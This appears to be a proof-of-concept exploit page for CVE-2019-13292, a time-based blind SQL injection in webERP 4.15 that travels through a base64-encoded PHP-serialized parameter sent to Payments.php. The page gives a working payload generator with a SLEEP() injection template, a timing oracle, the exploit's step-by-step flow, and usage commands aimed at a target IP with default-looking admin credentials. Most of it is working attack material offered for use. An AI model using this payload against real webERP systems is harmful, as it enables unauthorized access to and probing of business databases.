PoC details: e97acfc42b3dcc5341f8c776c0929fd9bace72a9

Source
Related vulnerability
Title: webERP SQL injection vulnerability (CVE-2019-13292)
Description: webERP is an open-source inventory, purchasing, sales and accounting system (an ERP system). It supports inventory management, role and permission management, order management and financial management. webERP 4.15 contains a SQL injection vulnerability: the database-backed application does not validate externally supplied input before using it in SQL statements, so an attacker can use it to execute arbitrary SQL commands.
Description
This is a Python3 script that demonstrates an exploit for a Blind SQL Injection vulnerability in WebERP version 4.15.
Introduction
# Blind SQL Injection Exploit for WebERP

This is a Python3 script that demonstrates an exploit for a Blind SQL Injection vulnerability in WebERP version 4.15, initially discovered by Semen Alexandrovich Lyhin on June 10, 2019. The original exploit can be found [here](https://www.exploit-db.com/exploits/47013), and further details regarding the WebERP system can be obtained from the official WebERP website.

## Overview

The vulnerability lies in how WebERP handles a request parameter that arrives base64-encoded and is passed to PHP's unserialize(). The application decodes and deserializes that parameter into an array without any sanitization, and each element of the array is then concatenated directly into a SQL query with no further checks. Because the attacker controls the serialized array, any element can carry an injected SQL fragment.

## This Script

This script exploits the above vulnerability in the following steps:

1. A malicious payload is prepared by the generatePayload() function. It builds a PHP-serialized array whose elements contain the SQL injection fragments and base64-encodes the result.

2. The script logs in to the WebERP system with the provided credentials via the getCookies() function, which retrieves the session cookies used for the later requests.

3. A new supplier is created with the addSupplierID() function. The supplier's name is used later as a marker to identify the system's response.

4. The runExploit() function sends a POST request to the "Payments.php" page of the WebERP system, embedding the base64-encoded payload as a parameter in the POST data.

5. The response time of that request is measured. A response that is noticeably slower than a normal request indicates that the injected SLEEP() executed inside the SQL query, which confirms the blind SQL injection. Because the check is time-based, compare against a baseline request on the same host and allow for network jitter, or a slow server can produce a false positive.
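The following block is an added example, not the exploit.py from this PoC or webERP's own code. It reproduces the payload construction described in steps 1 and 5 offline: a PHP-compatible serializer for an indexed array of strings, the base64 wrapping that generatePayload() performs, a matching parser that shows what unserialize() would hand back to the application, a hypothetical string-concatenated query to illustrate the bug class, and the timing oracle used to judge the response. The injection template (value inside single quotes), the SQL statement in build_vulnerable_sql() and the table name are assumptions for illustration; the real statement in webERP is not shown on this page.

```python
import base64
import re

# Assumption (not from the page): the injected value lands inside single quotes in the
# vulnerable query, so the payload closes the quote, adds a delay and re-balances it.
INJECTION_TEMPLATE = "{marker}' AND SLEEP({delay}) AND '1'='1"


def php_serialize_string_array(values):
    """Serialize a list of str the way PHP serialize() renders an indexed array of strings:
    a:N:{i:0;s:LEN:"...";...}. LEN is the UTF-8 byte length; the value itself is not escaped."""
    out = [f"a:{len(values)}:{{"]
    for i, v in enumerate(values):
        out.append(f'i:{i};s:{len(v.encode("utf-8"))}:"{v}";')
    out.append("}")
    return "".join(out)


def php_unserialize_string_array(blob):
    """Minimal parser for the array shape above, used here to show what the endpoint
    recovers from the blob. Works on bytes because PHP string lengths are byte counts."""
    head = re.match(rb"a:(\d+):\{", blob)
    if head is None:
        raise ValueError("not a serialized PHP array")
    count, pos, values = int(head.group(1)), head.end(), []
    element = re.compile(rb'i:(\d+);s:(\d+):"')
    for _ in range(count):
        m = element.match(blob, pos)
        if m is None:
            raise ValueError(f"malformed element at offset {pos}")
        length, start = int(m.group(2)), m.end()
        value = blob[start:start + length]
        if blob[start + length:start + length + 2] != b'";':
            raise ValueError("string length does not match its terminator")
        values.append(value.decode("utf-8"))
        pos = start + length + 2
    if blob[pos:pos + 1] != b"}":
        raise ValueError("unterminated array")
    return values


def generate_payload(marker, delay=5):
    """Counterpart of the page's generatePayload(): serialized array -> base64 text.
    'marker' stands in for the supplier name the script creates (assumed usage)."""
    fragment = INJECTION_TEMPLATE.format(marker=marker, delay=delay)
    serialized = php_serialize_string_array([fragment])
    return base64.b64encode(serialized.encode("utf-8")).decode("ascii")


def decode_payload(payload):
    """What the vulnerable endpoint effectively does: base64-decode, then unserialize."""
    return php_unserialize_string_array(base64.b64decode(payload))


def build_vulnerable_sql(values):
    """Illustrative only: a query built by string concatenation, the bug class the page
    describes. Table, column and statement are hypothetical, not webERP's."""
    return "SELECT * FROM suppliers WHERE supplierid = '" + values[0] + "'"


def confirms_delay(elapsed, baseline, delay, tolerance=0.8):
    """Time-based oracle: the request counts as delayed only if the extra time over a
    baseline request covers most of the requested SLEEP, which filters ordinary jitter."""
    return (elapsed - baseline) >= delay * tolerance


if __name__ == "__main__":
    payload = generate_payload("PWNTEST")
    print(payload)                                   # what goes into the POST parameter
    print(decode_payload(payload))                   # what unserialize() hands the app
    print(build_vulnerable_sql(decode_payload(payload)))
```

Run it once to see the three stages side by side; the decoded array makes it obvious that nothing between base64 decoding and the query ever inspects the string, which is the whole of the bug.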
    
## Usage

```shell
python3 exploit.py <target> <path> <login> <password> <order>
```

Replace `<target>`, `<path>`, `<login>`, `<password>`, and `<order>` with your target IP address, target path, user login, user password, and company order respectively.

Example:

```shell
python3 exploit.py 192.168.1.1 'WEBerp/' admin weberp 1
```
File snapshot

[4.0K] /data/pocs/e97acfc42b3dcc5341f8c776c0929fd9bace72a9
├── [3.5K] exploit.py
└── [2.1K] README.md

0 directories, 2 files